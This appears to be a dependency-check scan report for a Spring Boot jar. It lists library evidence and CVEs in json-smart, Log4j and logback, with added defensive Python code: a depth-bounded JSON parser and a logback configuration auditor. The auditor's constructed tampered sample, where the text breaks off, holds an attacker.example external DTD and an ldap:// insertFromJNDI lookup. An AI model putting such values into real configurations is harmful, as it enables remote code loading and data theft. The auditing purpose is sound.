af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY
cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY
cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY
cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY
cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY
cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY
Vulnerable Software & Versions:
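Two of the json-smart findings above describe the same parser shape from two angles: CVE-2023-1370 (every '[' or '{' recurses one level deeper and nothing bounds the depth, so crafted input exhausts the stack) and CVE-2021-27568 (a number-conversion exception such as NumberFormatException escapes uncaught to the caller). The following Python is an added illustrative parser, not json-smart's code and not taken from the report, written to make both failure modes and their guards concrete: a nesting bound that turns deep input into a controlled parse error, and a number routine that converts the conversion error into the same controlled error instead of letting it escape. Passing max_depth=None reproduces the unbounded behaviour so the stack-exhaustion case can be observed. The 64-level default, the ok/rejected/crashed verdicts and the omission of string escape handling are choices of this example.

```python
"""Added illustrative parser (not json-smart's code) for the two json-smart
failure modes above: unbounded recursion on nested '[' / '{' (CVE-2023-1370
class) and a raw number-conversion exception escaping uncaught (CVE-2021-27568
class).  max_depth=None reproduces the unbounded behaviour."""

class ParseError(ValueError):
    """The only exception the hardened parser lets escape."""

class _Parser:
    def __init__(self, text, max_depth):
        self.s, self.i, self.max_depth = text, 0, max_depth

    def parse(self):
        v = self.value(0)
        self.ws()
        if self.i != len(self.s):
            raise ParseError("trailing data at %d" % self.i)
        return v

    def ws(self):
        while self.i < len(self.s) and self.s[self.i] in " \t\r\n":
            self.i += 1

    def peek(self, tok):
        return self.s.startswith(tok, self.i)

    def value(self, depth):
        self.ws()
        if self.peek("["):
            return self.container(depth + 1, "]", self.array_item)
        if self.peek("{"):
            return self.container(depth + 1, "}", self.object_item)
        if self.peek('"'):
            return self.string()
        for lit, val in (("true", True), ("false", False), ("null", None)):
            if self.peek(lit):
                self.i += len(lit)
                return val
        return self.number()

    def container(self, depth, close, item):
        # CVE-2023-1370 class: each '[' or '{' costs one recursion level and the
        # input chooses how many there are, so the depth must be bounded here.
        if self.max_depth is not None and depth > self.max_depth:
            raise ParseError("nesting deeper than %d" % self.max_depth)
        self.i += 1  # consume the opening bracket
        out = [] if close == "]" else {}
        self.ws()
        if self.peek(close):
            self.i += 1
            return out
        while True:
            item(out, depth)
            self.ws()
            if self.peek(","):
                self.i += 1
            elif self.peek(close):
                self.i += 1
                return out
            else:
                raise ParseError("expected ',' or %r at %d" % (close, self.i))

    def array_item(self, out, depth):
        out.append(self.value(depth))

    def object_item(self, out, depth):
        self.ws()
        if not self.peek('"'):
            raise ParseError("expected string key at %d" % self.i)
        key = self.string()
        self.ws()
        if not self.peek(":"):
            raise ParseError("expected ':' at %d" % self.i)
        self.i += 1
        out[key] = self.value(depth)

    def string(self):
        start = self.i + 1
        end = self.s.find('"', start)  # escape sequences deliberately ignored
        if end < 0:
            raise ParseError("unterminated string at %d" % start)
        self.i = end + 1
        return self.s[start:end]

    def number(self):
        start = self.i
        while self.i < len(self.s) and self.s[self.i] in "+-0123456789.eE":
            self.i += 1
        tok = self.s[start:self.i]
        # CVE-2021-27568 class: int()/float() raise ValueError on tokens such as
        # "1e", "-" or "", and an unhardened parser lets that escape uncaught.
        try:
            return int(tok) if tok.lstrip("+-").isdigit() else float(tok)
        except ValueError:
            raise ParseError("bad number %r at %d" % (tok, start)) from None

def parse(text, max_depth=64):
    return _Parser(text, max_depth).parse()

def check_input(text, max_depth=64):
    """Triage verdict: 'ok', 'rejected' (controlled ParseError) or 'crashed'
    (another exception escaped; RecursionError here is the Python counterpart
    of the JVM StackOverflowError the CVE describes)."""
    try:
        parse(text, max_depth)
        return "ok"
    except ParseError:
        return "rejected"
    except Exception:
        return "crashed"
```

The depth check sits at the single point where recursion is entered, which is what makes it auditable: with it, `"[" * 100000` is rejected at level 65 after a few hundred frames; without it (max_depth=None) the same input runs until the interpreter's stack limit. The number guard shows the other lesson of CVE-2021-27568: a library should expose one documented error type at its boundary rather than whatever the underlying conversion routine happens to throw.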
spring-music-sqldb-1.0.jar: jul-to-slf4j-1.7.25.jar
Description:
JUL to SLF4J bridge
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jul-to-slf4j-1.7.25.jar
MD5: ab28124cb05fec600f2ffe37b94629e0
SHA1: 0af5364cd6679bfffb114f0dec8a157aaa283b76
SHA256: 416c5a0c145ad19526e108d44b6bf77b75412d47982cce6ce8d43abdbdbb0fac
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | jul-to-slf4j | High
Vendor | jar | package name | bridge | Highest
Vendor | jar | package name | slf4j | Highest
Vendor | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5 | Low
Vendor | Manifest | bundle-symbolicname | jul.to.slf4j | Medium
Vendor | pom | artifactid | jul-to-slf4j | Low
Vendor | pom | groupid | org.slf4j | Highest
Vendor | pom | name | JUL to SLF4J bridge | High
Vendor | pom | parent-artifactid | slf4j-parent | Low
Vendor | pom | url | http://www.slf4j.org | Highest
Product | file | name | jul-to-slf4j | High
Product | jar | package name | bridge | Highest
Product | jar | package name | slf4j | Highest
Product | Manifest | Bundle-Name | jul-to-slf4j | Medium
Product | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5 | Low
Product | Manifest | bundle-symbolicname | jul.to.slf4j | Medium
Product | pom | artifactid | jul-to-slf4j | Highest
Product | pom | groupid | org.slf4j | Highest
Product | pom | name | JUL to SLF4J bridge | High
Product | pom | parent-artifactid | slf4j-parent | Medium
Product | pom | url | http://www.slf4j.org | Medium
Version | file | version | 1.7.25 | High
Version | Manifest | Bundle-Version | 1.7.25 | High
Version | Manifest | Implementation-Version | 1.7.25 | High
Version | pom | version | 1.7.25 | Highest
spring-music-sqldb-1.0.jar: lang-tag-1.7.jar
Description:
Java implementation of "Tags for Identifying Languages" (RFC 5646)
License:
The Apache Software License, Version 2.0: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/lang-tag-1.7.jar
MD5: 31b8a4f76fdbf21f1d667f9d6618e0b2
SHA1: 97c73ecd70bc7e8eefb26c5eea84f251a63f1031
SHA256: e8c1c594e2425bdbea2d860de55c69b69fc5d59454452449a0f0913c2a5b8a31
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | lang-tag | High
Vendor | jar | package name | langtag | Highest
Vendor | jar | package name | nimbusds | Highest
Vendor | Manifest | build-date | ${timestamp} | Low
Vendor | Manifest | build-jdk-spec | 11 | Low
Vendor | Manifest | build-number | ${buildNumber} | Low
Vendor | Manifest | build-tag | 1.7 | Low
Vendor | Manifest | bundle-docurl | https://connect2id.com/ | Low
Vendor | Manifest | bundle-symbolicname | lang-tag | Medium
Vendor | Manifest | Implementation-Vendor | Connect2id Ltd. | High
Vendor | Manifest | Implementation-Vendor-Id | com.nimbusds | Medium
Vendor | Manifest | specification-vendor | Connect2id Ltd. | Low
Vendor | pom | artifactid | lang-tag | Low
Vendor | pom | developer email | vladimir@dzhuvinov.com | Low
Vendor | pom | developer id | vdzhuvinov | Medium
Vendor | pom | developer name | Vladimir Dzhuvinov | Medium
Vendor | pom | groupid | com.nimbusds | Highest
Vendor | pom | name | Nimbus LangTag | High
Vendor | pom | organization name | Connect2id Ltd. | High
Vendor | pom | organization url | https://connect2id.com/ | Medium
Vendor | pom | url | https://bitbucket.org/connect2id/nimbus-language-tags | Highest
Product | file | name | lang-tag | High
Product | jar | package name | langtag | Highest
Product | jar | package name | nimbusds | Highest
Product | Manifest | build-date | ${timestamp} | Low
Product | Manifest | build-jdk-spec | 11 | Low
Product | Manifest | build-number | ${buildNumber} | Low
Product | Manifest | build-tag | 1.7 | Low
Product | Manifest | bundle-docurl | https://connect2id.com/ | Low
Product | Manifest | Bundle-Name | Nimbus LangTag | Medium
Product | Manifest | bundle-symbolicname | lang-tag | Medium
Product | Manifest | Implementation-Title | Nimbus LangTag | High
Product | Manifest | specification-title | Nimbus LangTag | Medium
Product | pom | artifactid | lang-tag | Highest
Product | pom | developer email | vladimir@dzhuvinov.com | Low
Product | pom | developer id | vdzhuvinov | Low
Product | pom | developer name | Vladimir Dzhuvinov | Low
Product | pom | groupid | com.nimbusds | Highest
Product | pom | name | Nimbus LangTag | High
Product | pom | organization name | Connect2id Ltd. | Low
Product | pom | organization url | https://connect2id.com/ | Low
Product | pom | url | https://bitbucket.org/connect2id/nimbus-language-tags | Medium
Version | file | version | 1.7 | High
Version | Manifest | build-tag | 1.7 | Low
Version | Manifest | Implementation-Version | 1.7 | High
Version | pom | version | 1.7 | Highest
spring-music-sqldb-1.0.jar: lettuce-core-5.0.3.RELEASE.jar
Description:
Advanced and thread-safe Java Redis client for synchronous, asynchronous, and
reactive usage. Supports Cluster, Sentinel, Pipelining, Auto-Reconnect, Codecs
and much more.
License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/lettuce-core-5.0.3.RELEASE.jar
MD5: 13eaad4169405dc6fb621378f3655385
SHA1: a888355a2c69ba7329ee542e1cc4cc5b90da1723
SHA256: 08cbd74d328d82e7857c6915742f0a9263b3b1b5385bf7658fce94c0b2a18de3
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | lettuce-core | High
Vendor | jar | package name | cluster | Highest
Vendor | jar | package name | core | Highest
Vendor | jar | package name | core | Low
Vendor | jar | package name | io | Highest
Vendor | jar | package name | io | Low
Vendor | jar | package name | lettuce | Highest
Vendor | jar | package name | lettuce | Low
Vendor | jar | package name | sentinel | Highest
Vendor | pom | artifactid | lettuce-core | Low
Vendor | pom | developer id | mp911de | Medium
Vendor | pom | developer id | will | Medium
Vendor | pom | developer name | Mark Paluch | Medium
Vendor | pom | developer name | Will Glozer | Medium
Vendor | pom | groupid | io.lettuce | Highest
Vendor | pom | name | Lettuce | High
Vendor | pom | organization name | lettuce.io | High
Vendor | pom | organization url | https://lettuce.io | Medium
Vendor | pom | url | http://github.com/lettuce-io/lettuce-core | Highest
Product | file | name | lettuce-core | High
Product | jar | package name | cluster | Highest
Product | jar | package name | core | Highest
Product | jar | package name | core | Low
Product | jar | package name | io | Highest
Product | jar | package name | lettuce | Highest
Product | jar | package name | lettuce | Low
Product | jar | package name | sentinel | Highest
Product | pom | artifactid | lettuce-core | Highest
Product | pom | developer id | mp911de | Low
Product | pom | developer id | will | Low
Product | pom | developer name | Mark Paluch | Low
Product | pom | developer name | Will Glozer | Low
Product | pom | groupid | io.lettuce | Highest
Product | pom | name | Lettuce | High
Product | pom | organization name | lettuce.io | Low
Product | pom | organization url | https://lettuce.io | Low
Product | pom | url | http://github.com/lettuce-io/lettuce-core | Medium
Version | pom | version | 5.0.3.RELEASE | Highest
spring-music-sqldb-1.0.jar: log4j-api-2.10.0.jar
Description:
The Apache Log4j API
License:
https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/log4j-api-2.10.0.jar
MD5: b15b1def49daaf7e74fffcce9442ba98
SHA1: fec5797a55b786184a537abd39c3fa1449d752d6
SHA256: 26af661e5c37cfe233cdec402e8a5c0bd112e03d3b6cf12b0d9db7ee7f6fbdd9
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | log4j-api | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | log4j | Highest
Vendor | jar | package name | logging | Highest
Vendor | jar | package name | org | Highest
Vendor | Manifest | automatic-module-name | | Medium
Vendor | Manifest | bundle-docurl | https://www.apache.org/ | Low
Vendor | Manifest | bundle-symbolicname | org.apache.logging.log4j.api | Medium
Vendor | Manifest | implementation-url | https://logging.apache.org/log4j/2.x/log4j-api/ | Low
Vendor | Manifest | Implementation-Vendor | The Apache Software Foundation | High
Vendor | Manifest | Implementation-Vendor-Id | org.apache | Medium
Vendor | Manifest | log4jreleasekey | B3D8E1BA | Low
Vendor | Manifest | log4jreleasemanager | Ralph Goers | Low
Vendor | Manifest | multi-release | true | Low
Vendor | Manifest | specification-vendor | The Apache Software Foundation | Low
Vendor | pom | artifactid | log4j-api | Low
Vendor | pom | groupid | org.apache.logging.log4j | Highest
Vendor | pom | name | Apache Log4j API | High
Vendor | pom | parent-artifactid | log4j | Low
Product | file | name | log4j-api | High
Product | jar | package name | apache | Highest
Product | jar | package name | log4j | Highest
Product | jar | package name | logging | Highest
Product | jar | package name | org | Highest
Product | Manifest | automatic-module-name | | Medium
Product | Manifest | bundle-docurl | https://www.apache.org/ | Low
Product | Manifest | Bundle-Name | Apache Log4j API | Medium
Product | Manifest | bundle-symbolicname | org.apache.logging.log4j.api | Medium
Product | Manifest | Implementation-Title | Apache Log4j API | High
Product | Manifest | implementation-url | https://logging.apache.org/log4j/2.x/log4j-api/ | Low
Product | Manifest | log4jreleasekey | B3D8E1BA | Low
Product | Manifest | log4jreleasemanager | Ralph Goers | Low
Product | Manifest | multi-release | true | Low
Product | Manifest | specification-title | Apache Log4j API | Medium
Product | pom | artifactid | log4j-api | Highest
Product | pom | groupid | org.apache.logging.log4j | Highest
Product | pom | name | Apache Log4j API | High
Product | pom | parent-artifactid | log4j | Medium
Version | file | version | 2.10.0 | High
Version | Manifest | Bundle-Version | 2.10.0 | High
Version | Manifest | Implementation-Version | 2.10.0 | High
Version | Manifest | log4jreleaseversion | 2.10.0 | Medium
Version | pom | version | 2.10.0 | Highest
CVE-2020-9488
Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender. Fixed in Apache Log4j 2.12.3 and 2.13.1
CWE-295 Improper Certificate Validation
CVSSv3:
Base Score: LOW (3.7)
Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3)
Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MITIGATION,PATCH,VENDOR_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY
security@apache.org - ISSUE_TRACKING,MITIGATION,PATCH,VENDOR_ADVISORY
security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY
security@apache.org - PATCH,THIRD_PARTY_ADVISORY
security@apache.org - PATCH,THIRD_PARTY_ADVISORY
security@apache.org - PATCH,THIRD_PARTY_ADVISORY
security@apache.org - THIRD_PARTY_ADVISORY
security@apache.org - THIRD_PARTY_ADVISORY
security@apache.org - THIRD_PARTY_ADVISORY
security@apache.org - THIRD_PARTY_ADVISORY
security@apache.org - THIRD_PARTY_ADVISORY
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: log4j-to-slf4j-2.10.0.jar
Description:
The Apache Log4j binding between Log4j 2 API and SLF4J.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/log4j-to-slf4j-2.10.0.jar
MD5: 7ac821f6ff3d7f9ed68ffe982a76b8c2
SHA1: f7e631ccf49cfc0aefa4a2a728da7d374c05bd3c
SHA256: b9006337856504a2dd930eb4900ca78d63c13c8a2dd195fc65ca2aa4cfc04850
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | log4j-to-slf4j | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | logging | Highest
Vendor | jar | package name | slf4j | Highest
Vendor | Manifest | automatic-module-name | org.apache.logging.slf4j | Medium
Vendor | Manifest | bundle-docurl | https://www.apache.org/ | Low
Vendor | Manifest | bundle-symbolicname | org.apache.logging.log4j.to-slf4j | Medium
Vendor | Manifest | implementation-url | https://logging.apache.org/log4j/2.x/log4j-to-slf4j/ | Low
Vendor | Manifest | Implementation-Vendor | The Apache Software Foundation | High
Vendor | Manifest | Implementation-Vendor-Id | org.apache | Medium
Vendor | Manifest | log4jreleasekey | B3D8E1BA | Low
Vendor | Manifest | log4jreleasemanager | Ralph Goers | Low
Vendor | Manifest | specification-vendor | The Apache Software Foundation | Low
Vendor | pom | artifactid | log4j-to-slf4j | Low
Vendor | pom | groupid | org.apache.logging.log4j | Highest
Vendor | pom | name | Apache Log4j to SLF4J Adapter | High
Vendor | pom | parent-artifactid | log4j | Low
Product | file | name | log4j-to-slf4j | High
Product | jar | package name | apache | Highest
Product | jar | package name | logging | Highest
Product | jar | package name | slf4j | Highest
Product | Manifest | automatic-module-name | org.apache.logging.slf4j | Medium
Product | Manifest | bundle-docurl | https://www.apache.org/ | Low
Product | Manifest | Bundle-Name | Apache Log4j to SLF4J Adapter | Medium
Product | Manifest | bundle-symbolicname | org.apache.logging.log4j.to-slf4j | Medium
Product | Manifest | Implementation-Title | Apache Log4j to SLF4J Adapter | High
Product | Manifest | implementation-url | https://logging.apache.org/log4j/2.x/log4j-to-slf4j/ | Low
Product | Manifest | log4jreleasekey | B3D8E1BA | Low
Product | Manifest | log4jreleasemanager | Ralph Goers | Low
Product | Manifest | specification-title | Apache Log4j to SLF4J Adapter | Medium
Product | pom | artifactid | log4j-to-slf4j | Highest
Product | pom | groupid | org.apache.logging.log4j | Highest
Product | pom | name | Apache Log4j to SLF4J Adapter | High
Product | pom | parent-artifactid | log4j | Medium
Version | file | version | 2.10.0 | High
Version | Manifest | Bundle-Version | 2.10.0 | High
Version | Manifest | Implementation-Version | 2.10.0 | High
Version | Manifest | log4jreleaseversion | 2.10.0 | Medium
Version | pom | version | 2.10.0 | Highest
spring-music-sqldb-1.0.jar: logback-classic-1.2.3.jar
Description:
logback-classic module
License:
http://www.eclipse.org/legal/epl-v10.html, http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/logback-classic-1.2.3.jar
MD5: 64f7a68f931aed8e5ad8243470440f0b
SHA1: 7c4f3c474fb2c041d8028740440937705ebb473a
SHA256: fb53f8539e7fcb8f093a56e138112056ec1dc809ebb020b59d8a36a5ebac37e0
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | logback-classic | High
Vendor | jar | package name | ch | Highest
Vendor | jar | package name | classic | Highest
Vendor | jar | package name | logback | Highest
Vendor | jar | package name | qos | Highest
Vendor | Manifest | bundle-docurl | http://www.qos.ch | Low
Vendor | Manifest | bundle-requiredexecutionenvironment | JavaSE-1.6 | Low
Vendor | Manifest | bundle-symbolicname | ch.qos.logback.classic | Medium
Vendor | Manifest | originally-created-by | Apache Maven Bundle Plugin | Low
Vendor | pom | artifactid | logback-classic | Low
Vendor | pom | groupid | ch.qos.logback | Highest
Vendor | pom | name | Logback Classic Module | High
Vendor | pom | parent-artifactid | logback-parent | Low
Product | file | name | logback-classic | High
Product | jar | package name | ch | Highest
Product | jar | package name | classic | Highest
Product | jar | package name | logback | Highest
Product | jar | package name | qos | Highest
Product | Manifest | bundle-docurl | http://www.qos.ch | Low
Product | Manifest | Bundle-Name | Logback Classic Module | Medium
Product | Manifest | bundle-requiredexecutionenvironment | JavaSE-1.6 | Low
Product | Manifest | bundle-symbolicname | ch.qos.logback.classic | Medium
Product | Manifest | originally-created-by | Apache Maven Bundle Plugin | Low
Product | pom | artifactid | logback-classic | Highest
Product | pom | groupid | ch.qos.logback | Highest
Product | pom | name | Logback Classic Module | High
Product | pom | parent-artifactid | logback-parent | Medium
Version | file | version | 1.2.3 | High
Version | Manifest | Bundle-Version | 1.2.3 | High
Version | pom | version | 1.2.3 | Highest
CVE-2023-6378
A serialization vulnerability in logback receiver component part of
logback version 1.4.11 allows an attacker to mount a Denial-Of-Service
attack by sending poisoned data.
CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2021-42550
In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers.
CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: MEDIUM (6.6)
Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:0.7/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (8.5)
Vector: /AV:N/AC:M/Au:S/C:C/I:C/A:C
References:
OSSINDEX - [CVE-2021-42550] CWE-502: Deserialization of Untrusted Data
OSSIndex - https://jira.qos.ch/browse/LOGBACK-1591
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY
vulnerability@ncsc.ch - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY
vulnerability@ncsc.ch - EXPLOIT,THIRD_PARTY_ADVISORY
vulnerability@ncsc.ch - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY
vulnerability@ncsc.ch - MAILING_LIST,THIRD_PARTY_ADVISORY
v
vulnerability@ncsc.ch - THIRD_PARTY_ADVISORY
vulnerability@ncsc.ch - THIRD_PARTY_ADVISORY
vulnerability@ncsc.ch - VENDOR_ADVISORY
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: logback-core-1.2.3.jar
Description:
logback-core module
License:
http://www.eclipse.org/legal/epl-v10.html, http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/logback-core-1.2.3.jar
MD5: 841fc80c6edff60d947a3872a2db4d45
SHA1: 864344400c3d4d92dfeb0a305dc87d953677c03c
SHA256: 5946d837fe6f960c02a53eda7a6926ecc3c758bbdd69aa453ee429f858217f22
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | logback-core | High
Vendor | jar | package name | ch | Highest
Vendor | jar | package name | core | Highest
Vendor | jar | package name | logback | Highest
Vendor | jar | package name | qos | Highest
Vendor | Manifest | bundle-docurl | http://www.qos.ch | Low
Vendor | Manifest | bundle-requiredexecutionenvironment | JavaSE-1.6 | Low
Vendor | Manifest | bundle-symbolicname | ch.qos.logback.core | Medium
Vendor | Manifest | originally-created-by | Apache Maven Bundle Plugin | Low
Vendor | pom | artifactid | logback-core | Low
Vendor | pom | groupid | ch.qos.logback | Highest
Vendor | pom | name | Logback Core Module | High
Vendor | pom | parent-artifactid | logback-parent | Low
Product | file | name | logback-core | High
Product | jar | package name | ch | Highest
Product | jar | package name | core | Highest
Product | jar | package name | logback | Highest
Product | jar | package name | qos | Highest
Product | Manifest | bundle-docurl | http://www.qos.ch | Low
Product | Manifest | Bundle-Name | Logback Core Module | Medium
Product | Manifest | bundle-requiredexecutionenvironment | JavaSE-1.6 | Low
Product | Manifest | bundle-symbolicname | ch.qos.logback.core | Medium
Product | Manifest | originally-created-by | Apache Maven Bundle Plugin | Low
Product | pom | artifactid | logback-core | Highest
Product | pom | groupid | ch.qos.logback | Highest
Product | pom | name | Logback Core Module | High
Product | pom | parent-artifactid | logback-parent | Medium
Version | file | version | 1.2.3 | High
Version | Manifest | Bundle-Version | 1.2.3 | High
Version | pom | version | 1.2.3 | Highest
CVE-2023-6378
A serialization vulnerability in the logback receiver component (the NVD description names logback version 1.4.11; earlier releases, including the 1.2.3 flagged here, are affected as well) allows an attacker to mount a Denial-of-Service attack by sending poisoned data to a receiver socket. A receiver only exists when the configuration declares one that listens on a network port, so an application without a configured receiver is not reachable through this path. The fix for the 1.2 series shipped in logback 1.2.13.
CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (exploitability subscore 3.9)
References:
Vulnerable Software & Versions:
CVE-2021-42550
In logback version 1.2.7 and prior versions, an attacker with the privileges required to edit configuration files could craft a malicious configuration that causes arbitrary code loaded from LDAP servers to be executed; the lookup is performed by the insertFromJNDI configuration element. Exploitation therefore requires write access to the configuration that logback loads, which is why the CVSS vector carries PR:H. Upgrading to 1.2.9 or later removes the issue.
CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: MEDIUM (6.6) Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H (exploitability subscore 0.7)
CVSSv2:
Base Score: HIGH (8.5) Vector: AV:N/AC:M/Au:S/C:C/I:C/A:C
References:
OSSINDEX - [CVE-2021-42550] CWE-502: Deserialization of Untrusted Data
OSSIndex - https://jira.qos.ch/browse/LOGBACK-1591
NVD references (sources af854a3a-2127-422b-91ae-364da2661108 and vulnerability@ncsc.ch), tagged EXPLOIT, ISSUE_TRACKING, PATCH, MAILING_LIST, THIRD_PARTY_ADVISORY, VDB_ENTRY, VENDOR_ADVISORY
Vulnerable Software & Versions:
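All four logback findings for this jar (CVE-2023-6378 and CVE-2021-42550 above, CVE-2024-12798 and CVE-2024-12801 below) share one prerequisite: the attacker has to get a particular construct into the configuration document that logback loads. The audit script below is an added example, not dependency-check or logback code; it scans a configuration document for the receiver, insertFromJNDI, Janino evaluator and external-DOCTYPE constructs those entries describe, so a deployment can confirm which paths are actually reachable before choosing between an upgrade and a suppression. The two configuration documents, host names and port are constructed for the example.

```python
"""Audit a logback XML configuration for the constructs behind the logback
CVEs in this report.  Added example; not dependency-check or logback code.
The two configuration documents below are constructed for the example."""
import re
import xml.etree.ElementTree as ET

JANINO = "JaninoEventEvaluator"


def extract_doctype(xml_text):
    """Return the <!DOCTYPE ...> declaration, or "" if there is none.
    A single regex stops at the first '>' inside an internal subset, so walk
    the text tracking [ ] nesting and quoted strings instead."""
    start = xml_text.find("<!DOCTYPE")
    if start < 0:
        return ""
    depth, quote = 0, None
    for i in range(start, len(xml_text)):
        c = xml_text[i]
        if quote:
            if c == quote:
                quote = None
        elif c in "\"'":
            quote = c
        elif c == "[":
            depth += 1
        elif c == "]":
            depth -= 1
        elif c == ">" and depth == 0:
            return xml_text[start:i + 1]
    return xml_text[start:]


def audit_logback_config(xml_text):
    """Return (cve, detail) findings for one configuration document."""
    findings = []
    doctype = extract_doctype(xml_text)
    # CVE-2024-12801: an external identifier in the DOCTYPE (SYSTEM/PUBLIC,
    # including external entity declarations) is resolved while parsing.
    if doctype and re.search(r"\b(SYSTEM|PUBLIC)\b", doctype):
        findings.append(("CVE-2024-12801",
                         "DOCTYPE with external identifier: " + " ".join(doctype.split())))
    # Parse the body with the DOCTYPE removed so the audit never resolves it.
    body = xml_text.replace(doctype, "", 1) if doctype else xml_text
    for el in ET.fromstring(body).iter():
        if el.tag == "insertFromJNDI":
            # CVE-2021-42550: a JNDI lookup driven by the config file, which
            # an LDAP server can answer with a remotely loaded class.
            findings.append(("CVE-2021-42550",
                             "insertFromJNDI env-entry-name=%r" % el.get("env-entry-name")))
        elif el.tag == "evaluator":
            cls = el.get("class", "")
            expr = el.findtext("expression")
            # CVE-2024-12798: JaninoEventEvaluator compiles <expression> as
            # Java; it is also the default evaluator class when none is given.
            if JANINO in cls or (not cls and expr is not None):
                findings.append(("CVE-2024-12798",
                                 "Janino evaluator expression=%r" % (expr or "").strip()))
        elif el.tag == "receiver":
            # CVE-2023-6378: only a configured receiver deserialises input
            # arriving over the network.
            findings.append(("CVE-2023-6378", "receiver class=%r" % el.get("class")))
    return findings


# Constructed samples: a plain console configuration and one carrying all
# four constructs.  Host names and the port are placeholders.
SAFE_CONFIG = """
<configuration>
  <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
    <encoder><pattern>%d %-5level %logger - %msg%n</pattern></encoder>
  </appender>
  <root level="INFO"><appender-ref ref="STDOUT"/></root>
</configuration>
"""

TAMPERED_CONFIG = """
<!DOCTYPE configuration SYSTEM "http://dtd.attacker.example/logback.dtd">
<configuration>
  <insertFromJNDI env-entry-name="ldap://attacker.example/cfg" as="cfg"/>
  <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
    <filter class="ch.qos.logback.core.filter.EvaluatorFilter">
      <evaluator>
        <expression>return message.contains("billing");</expression>
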